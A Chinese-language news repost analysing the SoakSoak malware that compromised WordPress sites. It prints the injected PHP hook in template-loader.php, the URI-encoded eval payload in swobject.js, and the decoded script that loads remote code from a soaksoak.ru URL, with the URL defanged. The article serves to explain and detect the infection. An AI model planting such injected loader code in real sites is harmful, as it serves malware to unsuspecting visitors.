欢迎光临
我们一直在努力

WordPress网站沦陷:恶意软件SoakSoak来了

WordPress是一款使用PHP语言开发的博客平台,用户架设属于自己的博客,也可以把 WordPress当作一个内容管理系统(CMS)来使用。

近几个月,WordPress安全漏洞事件频发,包括:免费主题暗藏后门,波及WordPress等知名CMS系统,WordPress 4.0以下版本存在跨站脚本漏洞

而现在,一款广泛传播的恶意软件已经感染了100,000多个WordPress网站,而且数字仍在增加。


Google将超过11,000个域名纳入黑名单

消息先是周日早上在WordPress社区传播,起因是Google将超过11,000域名列入黑名单,这些网站都被一款最新的恶意软件攻击,软件来源于SoakSoak.ru,所以起名为SoakSoak 恶意软件。由于现在互联网上有超过7亿网站使用WordPress,所以这样的恶意软件影响巨大。

一经感染,网站就会出现异常行为,包括重定向到SoakSoak.ru。访问网站的用户也可能会自动下载恶意程序。Google已经将11,000个可能已经感染病毒的网站列入黑名单。

WordPress网站沦陷:恶意软件SoakSoak来了

恶意软件分析

恶意软件SoakSoak会修改wp-includes/template-loader.php文件

1
2
3
4
5
6
<?php
function FuncQueueObject()
{
  wp_enqueue_script(“swfobject”);
}
add_action(“wp_enqueue_scripts”,‘FuncQueueObject’);

这样使得wp-includes/js/swobject.js文件会在每一个页面上加载,这个swobject.js文件包含加密的恶意js代码。

1
2
eval(decodeURIComponent
(“%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B”));

解密后的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
eval(decodeURIComponent(‘(
function()
{
    //var ua = navigator.userAgent.toLowerCase();
    //if (ua.indexOf(‘chrome‘) != -1) return;
    var head=document.getElementsByTagName(‘head‘)[0];
    var script=document.createElement(‘script‘);
    script.type=’text/javascript‘;
    script.src=’<span>hxxp://soaksoak.ru/xteas/code</span><span></span>’;
    script.id=‘xxyyzz_petushok’;
    head.appendChild(script);
}()
);));

恶意代码一旦被解密,就会加载SoakSoak.ru域名中的js:hxxp://soaksoak.ru/xteas/code

检测与预防
目前尚不清楚病毒是如何感染网站的。如果你正在使用WordPress,并且你担心你的网站被感染,Sucuri公司提供了免费网站扫描,你可以检测你的网站是否感染了病毒。

WordPress网站沦陷:恶意软件SoakSoak来了

上图是被被感染的wordpress

WordPress网站沦陷:恶意软件SoakSoak来了

检测结果如上图则是未被感染

如果想知道自己的网站是否被感染可以通过 网站安全检测

赞(0) 打赏
未经允许不得转载:中国宏阔黑客联盟|白帽黑客|网络渗透技术|网站安全|移动安全|通信安全 » WordPress网站沦陷:恶意软件SoakSoak来了
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏